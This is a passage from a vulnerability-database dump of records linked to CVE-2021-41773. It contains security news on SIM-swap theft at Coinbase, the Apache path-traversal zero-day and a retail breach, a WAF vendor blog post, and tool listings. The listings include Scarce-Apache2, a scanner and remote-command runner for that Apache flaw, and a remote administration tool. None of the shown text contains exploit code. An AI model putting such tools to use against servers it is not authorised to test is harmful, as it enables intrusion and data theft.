security keys or Time-based One Time Passwords (TOTP) with an authenticator app. 
Verification via SMS text messages is listed as an option, but with caveats: This verification is, after all, subject to [SIM-swap](<https://threatpost.com/mobile-customer-service-sim-swap-fraud/151993/>) or phone-port attack.\n\nSIM swapping\u200b\u200b is a form of fraud that allows crooks to bypass SMS-based 2FA and crack online banking or other high-value accounts such as cryptocurrency wallets. In a typical scenario, an attacker would start by phishing personal and banking information \u2013 often via SMS phishing, which has the added benefit of confirming that a victim\u2019s cell phone number is an active line. Next, an attacker calls the victim\u2019s mobile carrier \u2013 easily discovered with an online search \u2013 and convinces a service rep to port the line to a different SIM card/device.\n\n## Can We Please Just Ditch SMS-Based 2FA?\n\nExperts agree that we should stick a fork in SMS-based 2FA: It\u2019s clearly toast.\n\nRoger Grimes, author of \u201cHacking Multifactor Authentication\u201d and data-driven defense evangelist, for [KnowBe4, ](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkyRzZ_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74Jad0kl33W4of4UEvii1-2FaSF1UuT-2BEz-2F3w-2Fa4quMRgT-2BQRwS2UzU-2B80mrmRcZ7BOu57U-2BlcUbUsgPP5Wrdcp27qpLYZxzLJ8Qwfb3N2eINqk-2B5ALA-2BX5H1WrmgjAUxrSn8W0e1Z6v5ZnIV13lpn-2B50Ro1gC3Tlq6dmLQeuWBPT6iCljuZaA0Ro4dPQB024lIgxWmvsVLHVUCHy-2BYHA-2BMTirRBLwlLSZQSccA4CzRdeZ-2Fb9M-3D>) said that this has got to be at least the third or fourth time that Coinbase customers have been compromised. While all MFA solutions can be hacked multiple ways, SMS-based MFA are \u201camong the most hackable MFA solutions,\u201d he said.\n\nIt isn\u2019t exactly breaking news. 
In 2017, the [NIST Digital Identity Guidelines](<https://www.nist.gov/itl/applied-cybersecurity/tig/projects/special-publication-800-63>) said that SMS-based MFA was very weak and shouldn\u2019t be used to protect valuable data and content, going so far as to reserve the right to remove it as an allowed MFA solution completely in the future.\n\nIn spite of that, \u201cSMS-based MFA is probably the most used MFA solution on the internet today,\u201d Grimes said. He blames vendors who force users to rely on SMS-based MFA because that\u2019s what the vendor uses.\n\n\u201cAlmost all the users that do use SMS-based MFA do not know how easily it is hacked,\u201d Grimes contended, which is an issue with all MFA solutions. \u201cUsers are not told how each type can be still be hacked, abused and bypassed, sometimes easily so, and this leads to most users thinking they are being super secure because they are using MFA and far less hackable, when that is absolutely not the case.\u201d\n\nGrimes thinks that the MFA solution lies in making sure \u201cthat all stakeholders (e.g., management, buyers, implementers, sysadmins, users, etc.) understand what the potential weaknesses are for their particular type of MFA, and everyone is educated about possible attacks and how to avoid them.\u201d\n\nChris Clements, vice president of solutions architecture for Cerberus Sentinel, added that it\u2019s incumbent on cryptocurrency users to understand that they\u2019re constantly being targeted by cybercriminals attempting to rob them.\n\nAnd once those funds are gone, they\u2019re gone for good, Clements said. \u201cThe decentralized nature of most coins means that if criminals are successful in stealing them, there\u2019s very little chance you will be able to recover your losses,\u201d he said. 
\u201cAs such, it\u2019s important that users of cryptocurrency study up and implement appropriate opsec to protect themselves from the inevitable attacks, including ensuring that any computing devices or smartphones are hardened and up to date with the latest security patches and implementing strong unique passwords as well as multi-factor authentication controls such as TOTP or hardware security keys like FIDO. Finally, cold wallets kept completely offline are useful for limiting much easier online attack vectors.\u201d\n\n## Coinbase Makes Good on the Money\n\nCoinbase said that it will deposit funds back into victims\u2019 accounts, \u201cequal to the value of the currency improperly removed from your account at the time of the incident.\u201d Some customers have already been reimbursed, the exchange said, promising that customers will receive \u201cthe full value of what you lost.\u201d\n\nThe exchange is also providing free credit monitoring to affected customers.\n\nCoinbase encouraged users of SMS-based authentication to drop it and to instead use stronger MFA, including TOTP or a hardware security key. 
It also strongly encouraged victims to change their Coinbase account password to a new, strong and unique password: one that\u2019s not used on any other site.\n\nThe same goes for email accounts: \u201cBecause the third parties needed access to your personal email account as part of this incident, we strongly encourage you to change your password in the same way for your email account and for any other online accounts where you use a similar password,\u201d the exchange advised.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-10-01T20:08:23", "type": "threatpost", "title": "MFA Glitch Leads to 6K+ Coinbase Customers Getting Robbed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-01T20:08:23", "id": "THREATPOST:8325094507099F4F089C61EF2997445C", "href": "https://threatpost.com/mfa-glitch-coinbase-customers-robbery/175290/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-08T11:24:43", "description": "Apache Software has quickly issued a fix for a zero-day security bug in the Apache HTTP Server, which was first reported to the project last week. The vulnerability is under active exploitation in the wild, it said, and could allow attackers to access sensitive information.\n\nAccording to a [security advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) issued on Monday, the issue (CVE-2021-41773) could allow path traversal and subsequent file disclosure. 
Path traversal issues allow unauthorized people to access files on a web server, by tricking either the web server or the web application running on it into returning files that exist outside of the web root folder.\n\nThe vulnerability is rated Important, with a CVSS score of 5.1 out of 10.\n\nIn this case, the issue affects only version 2.4.49 of Apache\u2019s open-source web server, which offers cross-platform operability with all modern operating systems, including UNIX and Windows.\n\n\u201cA flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49,\u201d according to the advisory. \u201cAn attacker could use a path-traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by \u2018require all denied,\u2019 these requests can succeed.\u201d\n\nThe bug could also expose the source of interpreted files like CGI scripts, the advisory added, which may contain sensitive information that attackers can exploit for further attacks.\n\nResearchers such as the offensive team at Positive Technologies quickly created proof-of-concept exploits verifying the attack path, so expect more attack avenues to be publicly available soon:\n\nhttps://twitter.com/ptswarm/status/1445376079548624899\n\nTenable [noted that](<https://www.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited>) a Shodan search on Tuesday turned up about 112,000 Apache HTTP Servers that are confirmed to be running the vulnerable version, including 43,000 or so in the U.S.\n\n\u201cHowever, other vulnerable web servers might be configured to not display version information,\u201d according to the firm\u2019s blog.\n\nUsers can protect themselves by upgrading to version 2.4.50. 
It should be noted that \u201crequire all denied\u201d (which denies access to all requests) is the default for protecting documents outside of the web root, [researchers have reported](<https://twitter.com/damian_89_/status/1445388530130227208>) \u2013 which mitigates the issue.\n\nApache credited Ash Daulton and the cPanel Security Team for reporting the bug.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-10-05T20:01:27", "type": "threatpost", "title": "Apache Web Server Zero-Day Actively Exploited, Exposes Sensitive Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-05T20:01:27", "id": "THREATPOST:641CEDBD77D5E4711F6E56353D7B5E33", "href": "https://threatpost.com/apache-web-server-zero-day-sensitive-data/175340/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-05T20:07:15", "description": "Dallas-based Neiman Marcus Group is known worldwide as the go-to luxury retailer for the well-heeled. 
But their reputation for impeccable quality just took a big hit with revelations that the company was breached by an attacker back in May 2020.\n\nIt took 17 months for the retailer to notice.\n\nJust this week, Neiman Marcus [acknowledged the compromise](<https://www.neimanmarcusgroup.com/2021-09-30-Neiman-Marcus-Confirms-Unauthorized-Access-to-Customer-Online-Accounts>), which included personal customer information like names, contact information, payment card information (without CVV codes), gift card numbers (without PINs), usernames, passwords and even security questions associated with online Neiman Marcus accounts.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn total, Neiman Marcus, which also controls the brands Bergdorf Goodman, Neiman Marcus Last Call and Horchow, said 3.1 million cards were affected. But more than 85 percent of those had already expired, the company said.\n\n\u201cNo active Neiman Marcus-branded credit cards were impacted,\u201d the company\u2019s statement said. \u201cAt this time, the Company has no evidence that Bergdorf Goodman or Horchow online customer accounts were affected.\u201d\n\nNeiman Marcus is working with law enforcement and cybersecurity company Mandiant to get more information about the [retailer\u2019s compromise](<https://threatpost.com/protect-account-takeover-cyberattacks/175090/>), the company said.\n\n\u201cAt Neiman Marcus Group, customers are our top priority,\u201d Geoffroy van Raemdonck, the company\u2019s CEO, said in the announcement of the breach. \u201cWe are working hard to support our customers and answer questions about their online accounts. 
We will continue to take actions to enhance our system security and safeguard information.\u201d\n\n## **Undetected NMG Breach \u2018Dangerous\u2019 for Customers **\n\nBut security experts say it\u2019s too late for Neiman Marcus to protect its customers and that the delay in detection of the unauthorized access makes the situation more dire.\n\n\u201cThe breach occurred before Neiman Marcus filed for bankruptcy in September 2020, which could have caused a delay in identification,\u201d said Quentin Rhoads, director of professional services at security firm CriticalStart. \u201cFrom a security perspective it is very dangerous for a company to go this long without detecting and responding to a breach. More damage could have been done that has yet [to be] discovered.\u201d\n\nHe said it\u2019s likely the attackers sold off the access to NMG\u2019s systems to someone else for later abuse.\n\n\u201cEven though most of the credit cards and gift cards stolen don\u2019t contain data like pins and CVVs, and are probably expired, the theft of usernames and passwords is concerning,\u201d Rhoads added. \u201cThis data more than likely would be sold to other attackers who can use this for crimes such as [identity] theft in conjunction with the other personal information stolen.\u201d\n\nHe also said it\u2019s going to be hard to find any firm evidence of the breach, since so much time has passed since the initial compromise.\n\n\u201cMore than likely, critical evidence is no longer present in their systems,\u201d Rhoads said. \u201cThey could easily be unable to identify the initial point of the breach, what other areas did the attackers get access to, what the attackers did outside of stealing data. 
All of these points are critical for an organization to understand to appropriately notify [affected] parties, identify pathways to prevent this in the future, and [to provide] critical evidence to law enforcement to further criminal investigations.\u201d\n\n## **Lack of Security at Many Orgs Is \u2018Staggering\u2019**\n\nChris Clements, VP of solutions architecture at Cerberus Sentinel, was blunter about Neiman Marcus\u2019 security blunder.\n\n\u201cThe lack of both prevention and detection capabilities at many organizations is simply staggering,\u201d Clements said. \u201cI try as much as possible to shy away from victim blaming, but in many circumstances, organizations have been grossly negligent in securing customer data.\u201d\n\nClements added that in many breaches, it\u2019s very easy for an attacker to get their hands on customer data.\n\n\u201cDespite the press releases that almost never fail to describe the attackers or attack methods as \u2018highly sophisticated,\u2019 the reality is that most breaches aren\u2019t some \u2018super cyber heist plot\u2019 out of a bad movie, but rather akin so some guy walking in the front door and wheeling out a file cabinet and no one is around to notice.\u201d\n\nJustin Fier, a director with Darktrace, said Neiman Marcus\u2019s [security team](<https://threatpost.com/protect-account-takeover-cyberattacks/175090/>) should assume the attacker has been lurking in its systems since May 2020. He adds that it\u2019s the responsibility of Neiman Marcus to adopt a more modern security strategy.\n\n\u201cToday, the most cyber mature retailers are relying on artificial intelligence for everything from credit fraud to supply logistics and, of course, to continually monitor their risk across globally distributed networks and complex digital infrastructures,\u201d Fier said. 
\u201cAs retailers like Neiman Marcus adapt to a more virtual world and embrace innovations to support remote shopping (like its recently announced virtual sneaker showroom) we should expect attacks on the industry to increase. These innovations open more avenues for attackers to poke to access the private data of consumers. Businesses have a responsibility to ensure their consumers\u2019 personal data is protected with the best defensive technology available to them.\u201d\n\nFor now, Neiman Marcus is asking customers to reset their passwords and has set up a call center for those concerned about their information being compromised.\n\nNick Sanna, CEO of RiskLens, said retailers are under both ethical and regulatory obligations to protect customer data.\n\n\u201cThey have an obligation to keep this sensitive customer data safe and out of the hands of the wrong people, obligations that are both ethical and regulatory in nature,\u201d Sanna said. \u201cThe outcome of not doing this is exactly what Neiman Marcus Group is now facing.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-10-01T17:50:42", "type": "threatpost", "title": "3.1M Neiman Marcus Customer Card Details Breached", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-01T17:50:42", "id": "THREATPOST:49DCD8325E10F7898739335BD99AE94B", "href": "https://threatpost.com/neiman-marcus-customers-breach/175284/", "cvss": {"score": 0.0, "vector": "NONE"}}], "wallarmlab": [{"lastseen": "2021-12-07T18:39:22", "description": "Attacks against known vulnerabilities are one of the most common security risks. Have you seen an updated OWASP Top-10? 
A risk that used to be **A09 Using Components with Known Vulnerabilities** is now titled **A06:2021-Vulnerable and Outdated Components**. This category moved up to #06 from #9 in 2017. We highlighted this in our [OWASP Top 10 2021 proposal](<https://lab.wallarm.com/owasp-top-10-2021-proposal-based-on-a-statistical-data/>) that we published earlier this year.\n\nWe all know: _patch management is hard. _For many reasons: backward compatibility, code refactoring overheads, testing, legacy code. Patches and updates are just hard to apply on time. A kind of challenge where [WAFs](<https://www.wallarm.com/product/cloud-waf>) and [API Security Platform](<https://www.wallarm.com/product/cloud-native-api-security>) products can be a perfect solution with their attack detection capabilities, virtual patches, and proactive vulnerability detection capabilities.\n\n## Known attacks vs. unknown attacks\n\nWallarm introduces the new feature to highlight known attacks:\n\n 1. Attacks against known vulnerabilities and CVEs that are associated with them.\n 2. Typical payloads and attack vectors that our team already saw in the wild.\n\nBy using new filters, you can filter out all the known attacks for your analysis that drastically decreases the number of events for analysis. You can exclude events that are more likely to be mass scanning and random testing and instead focus on some unique events and unusual attacks. It\u2019s also a great way to identify any potential false positives as it\u2019s highly unlikely that the output for the known attacks would have any of them. Just use this attack query to exclude all the typical/known attacks and get only unusual events:\n\n * attacks today !known\n\nFor example, one of our customers had ~1K attacks for the last 7 days -- but only 12 events that were not relying on the typical tooling/CVEs/scanning. A huge difference in the amount of data to analyze.\n\nOr another use case. 
Suppose you learn about a new CVE that is relevant to your tech stack. In that case, you can instantly run a search query and check whether there have been any exploitation attempts against your applications.\n\nThe new feature is already deployed for the whole customer base. No updates or additional configuration are required. \n\n## See it in action\n\nThese are some examples of usage.\n\n**Choose between searching all events, known attacks, or unknown attacks**\n\n * All attacks - see all the results\n * Known attacks (CVE) - attacks that are known to target CVEs or have typical payloads\n * Other attacks - attacks that are not known, to keep 0-days and potential false positives\n\n\n**Search attacks by CVE**\n\nYou can search for attacks that use a particular CVE:\n\n * attacks today known CVE-2021-41773\n\nOr, if you like, find all the events that are related to any known CVE by using the _known cve_ keywords:\n\n * attacks today known cve\n\nAttack details now include CVE tags on the left side.\n\n## New CVEs\n\nThe Wallarm team has added more than 1500 recent CVEs to the list and keeps updating the database every day. One of the objectives is for the team to analyze all new CVEs and introduce filters as soon as public data on a CVE is published. 
Wallarm team also enumerates vulnerabilities backward by analysis of real attacks data to add filters for more known attacks and payloads seen in the wild.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-15T23:13:35", "type": "wallarmlab", "title": "Wallarm starts to highlight CVE to address OWASP Top-10 A6 Vulnerable and Outdated Components", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-15T23:13:35", "id": "WALLARMLAB:6D3FED0879553B4C47AD26ED1DEB5AEB", "href": "https://lab.wallarm.com/wallarm-starts-to-highlight-cve-to-address-owasp-top-10-a6-vulnerable-and-outdated-components/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "kitploit": [{"lastseen": "2021-11-04T00:41:18", "description": "Inventus is a spider designed to find subdomains of a specific domain 
by [ crawling ](<https://www.kitploit.com/search/label/Crawling>) it and any subdomains it discovers. It's a [ Scrapy ](<https://scrapy.org/>) spider, meaning it's easily modified and extendable to your needs. \n\n \n** Demo ** \n\n\n[  ](<https://asciinema.org/a/PGIeEpEwZTUdgxrolBpCjljHL>)\n\n \n** Requirements ** \n\n\n * Linux -- I haven't tested this on Windows. \n * Python 2.7 or Python 3.3+ \n * Scrapy 1.4.0 or above. \n \n** Installation ** \nInventus requires Scrapy to be installed before it can be run. Firstly, clone the repo and enter it. \n\n \n \n $ git clone https://github.com/nmalcolm/Inventus\n $ cd Inventus\n\nNow install the required dependencies using ` pip ` . \n\n \n \n $ pip install -r requirements.txt\n\nAssuming the installation succeeded, Inventus should be ready to use. \n \n** Usage ** \nThe most basic usage of Inventus is as follows: \n\n \n \n $ cd Inventus\n $ scrapy crawl inventus -a domain=facebook.com\n\nThis tells Scrapy which spider to use (\"inventus\" in this case), and passes the domain to the spider. Any subdomains found will be sent to ` STDOUT ` . \nThe other custom parameter is ` subdomain_limit ` . This sets a max limit of subdomains to [ discover ](<https://www.kitploit.com/search/label/Discover>) before quitting. The default value is 10000, but isn't a hard limit. \n\n \n \n $ scrapy crawl inventus -a domain=facebook.com -a subdomain_limit=100\n\n \n** Exporting ** \nExporting data can be done in multiple ways. The easiest way is redirecting ` STDOUT ` to a file. \n\n \n \n $ scrapy crawl inventus -a domain=facebook.com > facebook.txt\n\nScrapy has a built-in feature which allows you to export items into various formats, including CSV, JSON, and XML. Currently only subdomains will be exported, however this may change in the future. \n\n \n \n $ scrapy crawl inventus -a domain=facebook.com -t csv -o Facebook.csv\n\n \n** Configuration ** \nConfigurations can be made to how Inventus behaves. 
By default Inventus will ignore robots.txt, has a 30 second timeout, caches crawl data for 24 hours, has a crawl depth of 5, and uses Scrapy's AutoThrottle extension. These and more can all be changed by editing the ` inventus_spider/settings.py ` file. Scrapy's settings are [ well documented ](<https://doc.scrapy.org/en/latest/topics/settings.html#aws-access-key-id>) too. \n \n \n\n\n** [ Download Inventus ](<https://github.com/nmalcolm/Inventus>) **\n", "cvss3": {}, "published": "2017-09-18T14:30:15", "type": "kitploit", "title": "Inventus - A Spider Designed To Find Subdomains Of A Specific Domain By Crawling", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2017-09-18T14:30:15", "id": "KITPLOIT:3027120689321178260", "href": "http://www.kitploit.com/2017/09/inventus-spider-designed-to-find.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-05T14:37:59", "description": "[  ](<https://4.bp.blogspot.com/--9hNXCN9hCQ/WbnEOt8NWBI/AAAAAAAAI4E/JWACq2Oe7J4jlpruoRhVFfXJYl7AT1W-gCLcBGAs/s1600/binary-skull.jpg>)\n\n \n\n\nThe Pharos static binary [ analysis framework ](<https://www.kitploit.com/search/label/Analysis%20Framework>) is a project of the Software Engineering Institute at Carnegie Mellon University. The framework is designed to facilitate the automated [ analysis ](<https://www.kitploit.com/search/label/Analysis>) of binary programs. It uses the ROSE compiler infrastructure developed by Lawrence Livermore National Laboratory for disassembly, control flow analysis, instruction semantics, and more. \n\n \n\n\nThe current distribution in is a substantial update to the previous version, and is part of an ongoing process to release more of the framework and tools publicly. This release has a more generous BSD [ license ](<https://github.com/cmu-sei/pharos/blob/master/LICENSE.md>) than the previous release. 
Carnegie Mellon University retains the [ copyright ](<https://github.com/cmu-sei/pharos/blob/master/COPYRIGHT.md>) . \n\n \n\n\nThe Pharos framework is a research project, and the code is undergoing active development. No warranties of fitness for any purpose are provided. While this release provides build instructions, unit tests, and some documentation, much work remains to be done. We've tested a few select build configurations, but have not actively tested the portability of the source code. See the [ installation instructions ](<https://github.com/cmu-sei/pharos/blob/master/INSTALL.md>) for more details. \n\n \n\n\n** Pharos Static Binary Analysis Tools **\n\n \n\n\n** APIAnalyzer **\n\nAPIAnalyzer is a tool for finding sequences of API calls with the specified data and control relationships. This capability is intended to be used to detect common operating system interaction paradigms like opening a file, writing to it, and then closing it. \n\n \n\n\n** OOAnalyzer **\n\nOOAnalyzer is a tool for the [ analysis ](<https://www.kitploit.com/search/label/Analysis>) and recovery of object-oriented constructs. This tool was the subject of a paper titled \"Recovering C++ Objects From Binaries Using Inter-Procedural Data-Flow Analysis\" which was published at the ACM SIGPLAN on Program Protection and Reverse Engineering Workshop in 2014. The tool identifies object members and methods by tracking object pointers between functions in the program. This tool was previously named \"Objdigger\" and is in the process of being renamed OOAnalyzer as part of a substantial redesign using Prolog rules to recover the object attributes. \n\n \n\n\n** CallAnalyzer **\n\nCallAnalyzer is a tool for [ reporting ](<https://www.kitploit.com/search/label/Reporting>) the static parameters to API calls in a binary program. 
It is largely a demonstration of our current calling convention, parameter analysis, and type detection capabilities, although it also provides a useful [ analysis ](<https://www.kitploit.com/search/label/Analysis>) of the code in a program. \n\n \n\n\n** FN2Yara **\n\nFN2Yara is a tool to generate YARA signatures for matching functions in an executable program. Programs that share significant numbers of functions are likely to have behavior in common. \n\n \n\n\n** FN2Hash **\n\nFN2Hash is a tool for generating a variety of hashes and other descriptive properties of functions in an executable program. Like FN2Yara it can be used to support binary similarity analysis, or provide features for [ machine learning ](<https://www.kitploit.com/search/label/Machine%20Learning>) algorithm. \n\n \n\n\n** DumpMASM **\n\nDumpMASM is a tool for dumping disassembly listings from an executable using the Pharos framework in the same style as the other tools. It has not been actively maintained, and you should consider using ROSE's standard recursive disassembler instead. 
\n\n \n \n\n\n** [ Download Pharos ](<https://github.com/cmu-sei/pharos>) **\n", "cvss3": {}, "published": "2018-08-26T17:06:59", "type": "kitploit", "title": "Pharos - Static Binary Analysis Framework", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2018-08-26T17:06:59", "id": "KITPLOIT:9205213728263868656", "href": "http://www.kitploit.com/2017/09/pharos-static-binary-analysis-framework.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-07T12:01:32", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEhRWcdl04xGOBLlM_g9DzCMsFGGCPy3N36bwNXfArCm8SpaUroy9Mz1Hbu3C1TRfKxBxybgzs-SqbGIEGrRNmRVNsBKR6Q-xz_FidYUIKelwx0WxxGHbUKwuaAxqxbEllP6n3ltZ9GEJ5YooEJjV_t9qXahy8rxhXsfZdsm13xnvEsqubv2pKrmpz_ZTQ=s726>)\n\n \n\n\nThis tool can [scan](<https://www.kitploit.com/search/label/Scan> \"scan\" ) websites with CVE-2021-41773 [Vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"Vulnerability\" ) that are affecting Apache2 Webserver, ScaRCE can run too for executing [Remote](<https://www.kitploit.com/search/label/Remote> \"Remote\" ) Command Injections at the webservers that found from the [scanning](<https://www.kitploit.com/search/label/Scanning> \"scanning\" ) method (Only if the **MOD_CGI** is Enabled at the targeted webserver). This tool works with the provided Single target or Mass Target from a file list. 
Only use this tool for `Bug Hunting`/ `Pentesting Purposes`.\n\n \n\n\n[](<https://blogger.googleusercontent.com/img/a/AVvXsEhcRO_Dx6ScPy-zCqhbv9ZsB2Y5EC8Fo6FWrpWx7sC6H81feJvY1pb5uzirFi7KR2oxTamEqKPWFhxXCSe1KxDJRM7o_OPtZ0E_opEOIPdRH5-K7CLTLOPqYl8AVpIYyPIVzHN2y0b-oX3qT8PJHymUb-zEDweKomCW-IrxvpHMUWYDhxdLHAhrbYyhRg=s641>)\n\n \n\n\n[](<https://blogger.googleusercontent.com/img/a/AVvXsEibLpxQqYUk-e42cAQqZ79qpvIPld94BKnn9nRm5UKHJHHzCrxMmSyMaEe6e5oqhtxC1eNWqnS_fVBYSzclUT22R3QBDK-dVg6xZmz_UNeVjr8xPea5WH1k8ewTWW1cOFovZuFQKAI3eMTGsaEzRgRzc5Y-Zps4nILNgDM7M8lXAq_dR8u-VQ14vRnw4w=s643>)\n\n \n\n\n[](<https://blogger.googleusercontent.com/img/a/AVvXsEgITNTPLGq-_s81ClmEAdJnpep5lS-i7ge88cEABBssuGeWiMh_sGZKgZdfBjaSBtF28FxHMTgOgdYMX41-cRlbCm9fsupSbxh9IpupmTp8sfqoEJrktxbd5YYiIb9wjULUrKMQ24wVyYOMXEdo5voYEA9DjZ10AtWjOsnZGvMJj5h9sgKsomPSldh1xw=s726>)\n\n \n\n\n**Installation** \n\n \n \n - git clone https://github.com/HightechSec/scarce-apache2 \n - cd scarce-apache2 \n - bash scarce.sh \n \n\nor you can install in your system like this\n \n \n - git clone https://github.com/HightechSec/scarce-apache2 \n - cd scarce-apache2 \n - sudo cp scarce.sh /usr/bin/scarce && sudo chmod +x /usr/bin/scarce \n - $ scarce \n \n\n \n**Usage** \n\n\n * Menu's \n * Menu `1` is for scanning [LFI Vulnerability](<https://www.kitploit.com/search/label/LFI%20Vulnerability> \"LFI Vulnerability\" ) from a provided file that contains the `list of the target url` or a provided `single target url`.\n * Menu `2` is for scanning RCE Vulnerability from a provided file that contains the `list of the target url` or a provided `single target url`.\n * Menu `3` is for Executing RCE from a provided `single target url`. 
This will work for the `Maybe Vuln` Results or sometimes with a `500 Error Response`.\n * URL Format \n * Use `http://` like `http://example.com` or `https://` like `https://example.com` for the url formatting at Single Target usages\n * For Url or IP that has been provided from a `List`, **Don't Use** the URL Formatting like eg: \n * <https://target.com>\n * [http://hackerone.com](<https://hackerone.com> \"http://hackerone.com\" )\n * <https://bugcrowd.com>\n \n**Requirements** \n\n\n * curl\n * bash\n * git\n \n**Credits** \n\n\nThanks to:\n\n * [CVE-2021-41773 Reproduced](<https://twitter.com/ptswarm/status/1445376079548624899> \"CVE-2021-41773 Reproduced\" ) by [@ptswarm](<https://twitter.com/ptswarm> \"@ptswarm\" )\n * [Executing RCE in CVE-2021-41773](<https://twitter.com/hackerfantastic/status/1445531829985968137> \"Executing RCE in CVE-2021-41773\" ) by [@hackerfantastic](<https://twitter.com/hackerfantastic> \"@hackerfantastic\" )\n * [Removing 5xx Error when Running RCE](<https://twitter.com/lukejahnke/status/1445560511270064138> \"Removing 5xx Error when Running RCE\" ) by [@lukejahnke](<https://twitter.com/lukejahnke> \"@lukejahnke\" )\n \n \n\n\n**[Download Scarce-Apache2](<https://github.com/HightechSec/scarce-apache2> \"Download Scarce-Apache2\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-29T20:30:00", "type": "kitploit", "title": "Scarce-Apache2 - A Framework For Bug Hunting Or Pentesting Targeting Websites That Have CVE-2021-41773 Vulnerability In Public", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-29T20:30:00", "id": "KITPLOIT:1567876964965286721", "href": "http://www.kitploit.com/2021/10/scarce-apache2-framework-for-bug.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-04T08:40:00", "description": "[  ](<https://4.bp.blogspot.com/-Si8yaPUMk6A/WbnIMuc83AI/AAAAAAAAI4Q/G6AlC65nXJYeyTQmiODAwngeO5YUb9psACLcBGAs/s1600/outis.png>)\n\n \n\n\noutis is a custom [ Remote Administration Tool ](<https://www.kitploit.com/search/label/Remote%20Administration%20Tool>) (RAT) or something like that. Think [ Meterpreter ](<https://www.kitploit.com/search/label/Meterpreter>) or Empire-Agent. However, the focus of this tool is neither an exploit [ toolkit ](<https://www.kitploit.com/search/label/Toolkit>) (there are no exploits) nor persistent management of targets. The focus is to communicate between server and target system and to transfer files, share sockets, spawn shells and so on using various methods and platforms. \n\n \n\n\n** On the Name **\n\nThe cyclops Polyphemus in Homer's Odyssey had some issues with name resolution. When he asked for Odysseus' name, the hacker told him it is \"Outis\" meaning \"Nobody\" in ancient Greek. Thus, when Polyphemus later shouted, that Nobody was about to kill him, strangly no help arrived. \n\nMy thanks to Marcel for remembering this marvelous piece of classic tale. \n\n \n\n\n** Dependencies for the Handler **\n\nArchlinux users can install the following packages: \n\n * python3 